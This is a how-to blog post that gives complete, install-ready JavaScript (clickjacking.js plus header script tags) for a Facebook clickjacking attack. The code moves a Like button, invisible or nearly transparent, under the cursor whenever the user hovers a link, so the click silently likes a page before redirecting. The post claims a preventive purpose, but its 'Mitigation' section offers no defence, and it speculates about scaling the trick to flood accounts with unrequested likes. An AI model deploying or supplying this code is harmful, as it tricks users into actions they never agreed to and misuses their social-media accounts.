facebook clickjacking howto allows setting up a website where users will do a facebook like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) facebook like button bellow the mouse when the user hovers a link.
How it works
Since we cannot inject css or javascript inside the facebook iframe, we cannot change the cursor:pointer css property when the mouse is over the like button, so it would be suspicious to have a page always with a clicking-hand mouse cursor. The workaround was making the like button follow the mouse when it’s normal to have a clicking-hand mouse cursor (cursor:pointer) such as when hovering a link!
After clicking a link, the user will like the current page in facebook and will in fact be redirected to the href (through javascript magic – document.location.href) and a cookie will be defined so that the facebook like button no longer appears in future page loads.
Mitigation
The purpose of this script is creating a discussion about how to PREVENT clickjacking and by using this script for any reason other than security debugging you might be violating Facebook Terms and Service Statements and might lose your Facebook account.
As such, the code you have below it’s easily found on the web if you use it in your website and I’ll personally report you if you use it for malicious reasons.
What we’ll see in the future
Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it’s possible to share a website not directly connected to where the like button is placed, meaning I might place a like button in fernandomagro.com liking another website/domain.
So, it’s possible to create a database of websites and generate a lot of different like buttons consecutively in the same website.
Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking those galleries for 2 hours and then returning to facebook and realizing the account was flooded with a huge amount of unrequested likes.
Install it
I managed to wrap it all up around a nice javascript file that you just need to include to make it work in your webpage.
Change the headers of your webpage with the following:
<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="clickjacking.js"></script>
Then, download the file clickjacking.js and put it in an accessible folder:
var $J = jQuery.noConflict();
// solve: images and floating divs
function heightestChild(elem)
{
var t=0;
var t_elem;
$J("*",elem).each(function () {
if ( $J(this).outerHeight(true) > t ) {
t_elem=$J(this);
t=t_elem.outerHeight(true);
}
});
// we care about the heighest
if (elem.outerHeight(true) > t)
{
t = elem.outerHeight(true);
}
//return elem.outerHeight(true);
return t+3; // hotfix
}
function highestOffsetTop(elem)
{
var t=elem.offset().top;
var t_elem;
$J("*",elem).each(function () {
if ( $J(this).offset().top < t ) {
t_elem=$J(this);
t=t_elem.offset().top;
}
});
// we only care about the object that is most on top
if (elem.offset().top < t)
{
t = elem.offset().top;
}
//return elem.offset().top;
return t+3;
}
// 57 19 63
$J(document).ready(function(){
if (window.DO_CLICKJACKING) { // wrap up EVERYTHING
/*$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/
$J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');
var elementWidth = 0;
var elementHeight = 0;
var theElement = '';
var likeDone = 0;
if ($J.cookie("clickjacking_"+escape(document.URL)) == 1)
{
likeDone = 1;
}
// fired when the user clicks a link (likes our page) -> clickjacking is done
FB.Event.subscribe('edge.create', function(response) {
$J("#clickjacking").css("display", "none");
likeDone = 1;
$J.cookie("clickjacking_"+escape(document.URL), "1");
// let the user actually go to the link he clicked.
window.location.href = theElement.attr('href');
});
$J(document).mousemove(function(event) {
if (theElement != '')
{
if (event.pageY < (highestOffsetTop(theElement)-4) || event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX < theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) )
{
//alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top);
/* $J("#log").append("<p>mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + "</p>");
$J("#log").append("<p>mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) + "</p>");*/
theElement = ''; // the mouse is off theElement
$J("#clickjacking").css("display", "none");
}
else
{
if ($J.browser.msie) {
$J("#clickjacking").css("top",(event.pageY-15)+"px");
$J("#clickjacking").css("left",(event.pageX-20)+"px");
}
else
{
$J("#clickjacking").css("top",(event.pageY-5)+"px");
$J("#clickjacking").css("left",(event.pageX-20)+"px");
}
}
}
});
$J(document).delegate("a","mouseenter", function (){
// register mouse is inside element
if (likeDone == 0)
{
theElement = $J(this);
$J("#clickjacking").css("display", "block");
}
});
} // window.DO_CLICKJACKING
});
/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/
/**
* Create a cookie with the given name and value and other optional parameters.
*
* @example $.cookie('the_cookie', 'the_value');
* @desc Set the value of a cookie.
* @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
* @desc Create a cookie with all available options.
* @example $.cookie('the_cookie', 'the_value');
* @desc Create a session cookie.
* @example $.cookie('the_cookie', null);
* @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
* used when the cookie was set.
*
* @param String name The name of the cookie.
* @param String value The value of the cookie.
* @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
* @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
* If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
* If set to null or omitted, the cookie will be a session cookie and will not be retained
* when the the browser exits.
* @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
* @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
* @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {
value = '';
options.expires = -1;
}
var expires = '';
if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
var date;
if (typeof options.expires == 'number') {
date = new Date();
date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
} else {
date = options.expires;
}
expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
}
// CAUTION: Needed to parenthesize options.path and options.domain
// in the following expressions, otherwise they evaluate to undefined
// in the packed version for some reason...
var path = options.path ? '; path=' + (options.path) : '';
var domain = options.domain ? '; domain=' + (options.domain) : '';
var secure = options.secure ? '; secure' : '';
document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
} else { // only name given, get cookie
var cookieValue = null;
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split(';');
for (var i = 0; i < cookies.length; i++) {
var cookie = jQuery.trim(cookies[i]);
// Does this cookie string begin with the name we want?
if (cookie.substring(0, name.length + 1) == (name + '=')) {
cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
break;
}
}
}
return cookieValue;
}
};
